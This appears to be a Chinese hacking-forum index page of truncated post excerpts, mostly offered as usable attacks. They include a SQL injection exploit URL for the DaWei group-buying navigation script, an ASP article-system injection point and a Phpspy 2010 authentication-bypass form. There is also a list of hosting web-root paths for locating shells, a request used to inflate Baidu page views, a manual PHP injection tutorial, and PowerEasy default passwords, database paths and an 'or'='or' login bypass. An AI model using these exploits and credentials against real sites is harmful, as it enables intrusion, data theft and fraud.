【0day】DaWei 大维团购导航程序变量未初值化漏洞

    By:fjhgx 以下是引用片段: if($cateid) {         $container.=' and grouptype="'.$cateid.'"'; } if($cityid) {         $container.=' and cityid="'.$cityid.'"'; } $order=" order by recommend desc,sortorder desc"; $sql="select * from ".tname('groups')." where 1".$container." and ispassed=1 and lasttime>=".time().$order; 利用方式:     http://localhost/api/apidata.php?container=1{sql}

烈火文章后台管理系统 V2.1 0day

    By:暗月式     今天无聊就找了个简单的系统来分析学习,首先打开 article.asp 见如此语句: 以下是引用片段: </TR></TBODY></TABLE></TD> <TD vAlign=top align=middle width=1 bgColor=#cccccc></TD> <TD vAlign=top align=middle width=592 bgColor=#ffffff> <% set rs=conn.execute("select * from article where id="&a

各种常见虚拟主机目录、路径对照表

星外虚拟主机主机 D:\freehost\zhoudeyang\web\ Prim@Hosting虚拟主机 D:\hosting\wwwroot\ vhostroot分支 D:\Vhost\WebRoot\51dancecn\ vhostroot D:\vhostroot\localuser\ 星外分支 D:\vhostroot\LocalUser\gdrt\ 新网虚拟主机 D:\virtualhost\web580651\www\ 华众虚拟主机 E:\wwwroot\longzhihu\wwwroot\ 星外分支 F:\host\wz8088\web\ 万网虚拟主机

Phpspy 2010 身份验证绕过漏洞

    作者:未知 …… EXP代码: <form method="POST" action="https://lcx.cc/phpspy2010.php"> <input type="hidden" name="admin['pass']" value="1"> <input type="submit" value="Login"> </form>     在每次向 shell 请求数据的时候,都附加 post 一个 admin['pass'] 即可。 形成原因:     2009不存在该洞,仅限201

百度文章修改 恶意提高浏览量的测试 百度文章刷访问量

    By:BlAck.Eagle     早就发现这个地方有问题,可以导致恶意刷访问量。     在百度发表文章一篇,然后点击编辑,抓包,如下: POST /test/commit HTTP/1.1 Host: hi.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7

一次PHP手工注入与权限获得

小菜文章,大N勿喷 -------------------------------------- 原创教程BY :maya663 -------------------------------------- PHP手工注入基础 想学习的看了这篇绝对经典 --------------------------- 最近碰到一个站PHP站 http://xxx.com/ http://xxx.com/index.php?id=112 这上注入点 判断依据:and 1=1 and 1=2 你

易天科技商城 2.1 免费版漏洞

    By:笨子     是免费版的,再次注意是免费版的,又是没技术含量的洞。     看不懂代码,瞎蒙的,没几个能成功,求一套商业版的系统。 ------------------------------------------------------------------------------------- 搜索关键词:in

解析人类最常用的密码 有史以来说得出的最糟糕500个密码

From the moment people started using passwords, it didn't take long to realize how many people picked the very same passwords over and over. Even the way people misspell words is consistent. In fact, people are so predictable that most hackers make use of lists of common passwords just like these. To give you some insight into how predictable humans are, the following is a list of the 500 most

动易的默认数据库、用户和密码、认证码大全还有找后台方法

admin admin888 'or'='or' 8888 2007 2008 2006 SiteManageCode8888/SiteManageCode database/SiteWeaver6.5.mdb database/SiteWeaver.mdb PowerEasy2006 PowerEasy2007 PowerEasy2008 database/PowerEasy2006.mdb database/PowerEasy2007.mdb database/PowerEasy2008.mdb 找后台方法:     这个方法很巧,但也不是全部都行,因为有些的已经修改admin_login.asp的名称,针对修